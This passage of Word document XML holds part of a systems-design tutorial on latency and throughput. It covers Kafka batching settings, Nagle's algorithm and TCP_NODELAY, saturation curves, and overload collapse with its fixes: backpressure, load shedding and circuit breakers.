    <w:p w14:paraId="6A715E66" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The batching trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F5B7B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Large batches: high throughput, high latency (wait time to fill the batch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA52ACB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Small batches: low throughput, low latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A676E8F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Dynamic batching (batch until full OR until timeout): throughput approaches large batch, latency bounded by timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D09425C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kafka's batching mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743982A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77316DCE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Producer configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4E5D11" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  batch.size = 16384 bytes     (batch until 16KB accumulated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5517EF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  linger.ms = 5                (OR until 5ms has elapsed, whichever comes first)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8425F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB104B2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Low traffic (10 msg/second): most batches sent after 5ms (linger.ms timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DC83A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    → Latency: ~5ms, batch size: small</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C72F51" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  High traffic (10K msg/second): most batches sent after filling 16KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6EEC87" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    → Latency: negligible (fills quickly), batch size: full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3974B010" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C93386B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Dynamic: adapts throughput/latency trade-off to actual load automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E83C35" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nagle's Algorithm — TCP's built-in batching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565AA734" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Nagle's algorithm buffers small TCP writes until either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD4995" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>The buffer reaches the MSS (1460 bytes), OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548CD536" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>An ACK for all previously sent data has been received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC4AAA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>This effectively batches small writes into fewer, larger packets — improving throughput for small-message workloads. But it introduces latency: a small write may wait up to the RTT (waiting for ACK) before being sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532931A0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E61A71B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>TCP_NODELAY disables Nagle's algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354AACC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Benefits: immediate transmission of small messages (lower latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522934D7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Cost: more, smaller packets (lower throughput for small message workloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD090E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B1159B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Use TCP_NODELAY for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F96CC01" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Interactive protocols (SSH, gaming, financial trading)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271CFD09" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Request-response protocols where request is small but latency matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23FE5D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E2032F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Keep Nagle enabled for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA11444" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Bulk data transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009347A7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Large payload protocols where bandwidth efficiency matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D308811" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Throughput Cliff — What Happens at Saturation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E0C912" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The hockey stick behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8E9529" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At low loads, throughput scales linearly with offered load (λ). At some load level, throughput stops increasing while latency starts rising rapidly. At the saturation point, adding more load causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFD3158" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput to plateau (service rate is maxed out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AC2BA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency to grow without bound (queue grows indefinitely)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED3788" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Eventually: request timeouts, connection drops, cascading failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E782DB3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E2F4D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE97FCD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │              </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>████████████</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve"> (plateau at max throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD8CBB7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │          </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>████</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C0938" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │       </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>███</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACA65CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>███</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B0A672" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>███</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE1AA4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    └─────────────────────────→ Offered Load (λ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980B409" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7987886B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F897831" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D4CB70" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │                       │ (grows toward infinity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798D6725" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │                      /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BAE004" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │                    /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C30D0BE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │                  /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C4FA50" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │               /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3C17B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │             /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E24D2D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    │___________/ (flat at low utilization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB76162" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    └─────────────────────────→ Offered Load (λ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FC2A0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A2C53" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The throughput plateau and latency explosion occur at the same load level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F032879" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>This is the saturation point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273465E7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What causes the plateau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20360E62" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The bottleneck resource is at 100% utilization. Additional requests cannot be processed faster — they wait in queue. Throughput = service rate (constant). Latency = service time + queuing time (growing with queue depth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D299AC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The overload collapse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E2DAF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Beyond saturation, something worse can happen: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>throughput actually decreases</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> under higher offered load. This happens when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B5003" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Requests timeout and are retried — retry traffic amplifies offered load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43098132" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Retries compete with original requests — both share the saturated resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE299D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Long queues cause more timeouts — even requests that would have succeeded are abandoned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F4CB1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Error handling and retry logic consume additional CPU — less CPU for useful work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE0847" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F806DCD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Offered Load: 10,000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D011B6D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Service capacity: 8,000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E860927" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Queue growing → latency increases → clients timeout after 1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719EDDE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>After 1s: 2,000 original requests timeout, clients retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7292C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>New offered load: 10,000 original + 2,000 retries = 12,000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8380C9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Queue growing faster → more timeouts → more retries → death spiral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF065FA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7785022E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Effective throughput: may drop to 4,000-5,000 RPS (worse than at lower load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B1A129" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fix for overload collapse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8084DF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Backpressure:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> When the queue is full, reject new requests immediately with 503/429. Callers back off. Offered load decreases. Queue drains. System recovers. This is painful (errors to users) but prevents total collapse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76765D30" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Load shedding:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Prioritize high-value requests over low-value ones when overloaded. Drop bulk background traffic first. Drop requests from non-critical clients. Maintain service for critical paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E1F625" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Circuit breakers:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Stop trying to call saturated services — fail fast and apply fallback logic. Prevents retry amplification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ACBF16" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="27C91D13">
          <v:rect id="_x0000_i5200" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B7A12" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. The Latency-Throughput Trade-off — Where They Conflict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF6DE87" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When Optimizing for Throughput Hurts Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3C0A8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
